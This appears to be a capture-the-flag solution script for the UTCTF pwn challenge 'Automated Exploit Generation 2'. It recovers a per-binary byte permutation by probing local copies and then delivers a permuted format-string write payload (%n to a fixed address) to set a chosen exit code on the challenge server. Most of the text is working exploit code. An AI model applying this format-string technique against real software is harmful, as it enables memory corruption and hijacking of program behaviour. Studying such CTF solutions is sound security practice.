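# exp of Automated Exploit Generation 2

A little crypto (substitution) + pwn.

```python
"""Solver for UTCTF "Automated Exploit Generation 2" (pwn.utctf.live:5002).

Per round the service sends a binary as an ``xxd`` hex dump and then asks
for an input that makes it exit with a given code.  The script assumes the
binary reorders its 0x200 input bytes before using them: ``tester`` runs a
local copy on probe inputs to recover that reordering, and ``convert``
pre-permutes a format-string payload so it lands in the intended order.

NOTE: every binary under ./bins/ comes straight from the remote service and
is executed locally via ``process``; run this from a throwaway VM/container.
"""
import os
import subprocess

from pwn import *

context.arch = 'amd64'
context.terminal = ['tmux', 'split', '-h']
# p=process('./pwn')
# gdb.attach(p,'b *0x40131f')
# %49$p

HOST = "pwn.utctf.live"
PORT = 5002

PAYLOAD_LEN = 0x200      # the binaries read exactly this many bytes (script assumption)
TARGET_ADDR = 0x40405C   # address the format string writes to
ADDR_OFFSET = 0x30       # where the packed address sits inside the payload
PAD = b'\1'              # filler byte; never 0x00 or 0x0a (see pay_gen)


def _save_binary(hexdump, name):
    """Store one server-supplied dump as ./demos/<name>.hex and reverse it with
    ``xxd -r`` into ./bins/<name>; returns that binary's path.

    *hexdump* is the raw text up to and including the blank line that ends it;
    the final newline is dropped before writing.
    """
    hex_path = f"./demos/{name}.hex"
    bin_path = f"./bins/{name}"
    with open(hex_path, 'w') as f:
        f.write(hexdump[:-1].decode())
    # argv-list form: the dump's contents go through xxd's parser only, never
    # through a shell.  check=True surfaces a failed/missing xxd immediately
    # instead of a confusing error from process() later on.
    with open(bin_path, 'wb') as out:
        subprocess.run(["xxd", "-r", hex_path], stdout=out, check=True)
    # NOTE(review): nothing here marks bin_path executable; if process() refuses
    # to start it, an os.chmod(bin_path, 0o755) belongs here -- confirm.
    return bin_path


def get_bins():
    """Fetch 30 sample binaries from the service into ./bins/0 .. ./bins/29."""
    for idx in range(30):
        p = remote(HOST, PORT)
        try:
            p.read()                  # drain whatever the service prints first
            p.sendline(b"")
            data = p.readuntil(b"\n\n")
        finally:
            p.close()
        _save_binary(data, str(idx))


def pay_gen(re=0):
    """Build a 0x200-byte probe whose bytes identify their own offset.

    Offset k carries k mod 256.  With *re* truthy the second half carries
    (-k) mod 256 instead, so the two probes differ only there.  Byte values
    0x00 and 0x0a are replaced (by 1/2, or 2/1 when *re* is set), presumably
    because NUL and LF do not survive the binary's input path; using
    different substitutes per probe is what lets ``tester`` tell the
    replaced offsets apart.
    """
    probe = bytearray()
    for k in range(PAYLOAD_LEN):
        value = k % 0x100
        if re and k >= 0x100:
            value = (-value) % 0x100
        if value == 0x0a:
            value = 0x1 if re else 0x2
        if value == 0x0:
            value = 0x2 if re else 0x1
        probe.append(value)
    return bytes(probe)


def run_bin(input, path="./bins/0"):
    """Feed *input* to a local copy of the binary and return its output minus
    the trailing byte; the process is always closed, even on error."""
    p = process(path)
    try:
        p.sendline(input)
        return p.read()[:-1]
    finally:
        p.close()


def exp(input, path='./bins/0'):
    """Debug helper: run the binary under gdb with *input* and hand over the tty."""
    p = process(path)
    gdb.attach(p)
    p.sendline(input)
    p.interactive()


def _positions(out):
    """For each byte value 0..0xff list the output positions where it occurs.

    Values 0x00 and 0x0a get ``-1`` instead of a list: probes never contain
    them (see pay_gen), so they carry no position information.
    """
    pos = []
    for value in range(0x100):
        if value in (0, 0xa):
            pos.append(-1)
        else:
            pos.append([idx for idx in range(PAYLOAD_LEN) if out[idx] == value])
    return pos


def tester(path="./bins/0"):
    """Recover the input->output byte reordering applied by the binary at *path*.

    Runs the binary three times locally.  Returns ``mapping`` (length 0x200)
    where ``mapping[y]`` is the input offset whose byte shows up at output
    position ``y``; ``convert`` uses it to pre-permute a payload.
    """
    pos = _positions(run_bin(pay_gen(), path))
    pos2 = _positions(run_bin(pay_gen(-1), path))

    # res[k] = output position of input offset k (-1 until resolved).
    res = [-1] * PAYLOAD_LEN

    # Offsets 1 and 2 carry the same byte in both probes (the first halves are
    # identical), so the one output position they share is theirs.
    for k in (1, 2):
        for i in pos[k]:
            if i in pos2[k]:
                res[k] = i
                pos[k].remove(i)
                pos2[k].remove(i)
                break
    # Offset 0xa: byte 0x0a became 2 in probe 1 and 1 in probe 2.
    for i in pos[2]:
        if i in pos2[1]:
            res[0xa] = i
            pos[2].remove(i)
            pos2[1].remove(i)
            break
    # Offset 0x101: 1 in probe 1 (0x101 % 0x100) but 0xff in probe 2, so it is
    # the remaining position of byte 1 that is not also a position of byte 2.
    for i in pos[1]:
        if i not in pos2[2]:
            res[0x101] = i
            pos[1].remove(i)
            break
    # Offset 0x1fe: 0xfe in probe 1 but (-0xfe) % 256 == 2 in probe 2.
    for i in pos2[2]:
        if i not in pos[1]:
            res[0x1fe] = i
            pos2[2].remove(i)
            break

    # Every other value x (3..0xff) occurs at offsets x and x+0x100 in probe 1;
    # probe 2 still has x at offset x but (256-x) at offset x+0x100, so the
    # position that survives in pos2[x] belongs to offset x.
    # NOTE: x == 0x80 is ambiguous here (-0x80 % 256 == 0x80), but both of the
    # affected payload bytes are padding, so a swap does no harm.
    for k in range(0x100):
        if pos[k] == -1 or len(pos[k]) == 4:
            continue
        if len(pos[k]) == 2 and k > 2:
            first, second = pos[k]
            if first in pos2[k]:
                res[k], res[k + 0x100] = first, second
            else:
                res[k], res[k + 0x100] = second, first

    # Third run: the four offsets the first two probes cannot separate get
    # unique marker bytes and are located directly.
    markers = {0: 0x11, 0x100: 0x22, 0x102: 0x33, 0x10a: 0x44}
    probe = [1] * PAYLOAD_LEN
    for offset, marker in markers.items():
        probe[offset] = marker
    out = run_bin(bytes(probe), path)
    for offset, marker in markers.items():
        res[offset] = out.index(marker.to_bytes(1, 'big'))

    # Invert: mapping[y] = input offset whose byte lands at output position y.
    return [res.index(y) for y in range(PAYLOAD_LEN)]


def convert(pay, mapping):
    """Reorder *pay* (0x200 bytes) so that, after the binary applies the
    permutation described by *mapping* (from ``tester``), its bytes come out
    in the order given: byte y of *pay* is placed at input offset mapping[y]."""
    reordered = [-1] * PAYLOAD_LEN
    for y in range(PAYLOAD_LEN):
        reordered[mapping[y]] = pay[y]
    return bytes(reordered)


def _build_payload(ret_val):
    """Format-string payload for one round: print *ret_val* characters, then
    ``%14$n`` stores that count at TARGET_ADDR, whose packed address sits at
    ADDR_OFFSET.  With ret_val == 0 the ``%c`` is omitted so zero is written."""
    if ret_val:
        fmt = f"%{ret_val}c%14$n".encode()
    else:
        fmt = b"%14$n"
    payload = fmt.ljust(ADDR_OFFSET, PAD) + p64(TARGET_ADDR)
    return payload.ljust(PAYLOAD_LEN, PAD)


def do_test():
    """Local dry run against the saved sample ./bins/29 under gdb."""
    mapping = tester("./bins/29")
    payload = b"%c%14$n".ljust(ADDR_OFFSET, PAD) + p64(TARGET_ADDR)
    payload = payload.ljust(PAYLOAD_LEN, PAD)
    exp(convert(payload, mapping), "./bins/29")


def main():
    """Play rounds against the live service until it stops sending binaries."""
    p = remote(HOST, PORT)
    p.read()
    p.sendline(b"")
    while True:
        data = p.readuntil(b"\n\n")
        path = _save_binary(data, "cur")
        p.readuntil(b"Binary should exit with code ")
        ret_val = int(p.readline()[:-1])
        payload = convert(_build_payload(ret_val), tester(path))
        context.log_level = 'debug'
        p.sendlineafter(b": \n", payload)
        p.readline()
        p.interactive()


if __name__ == "__main__":
    main()
```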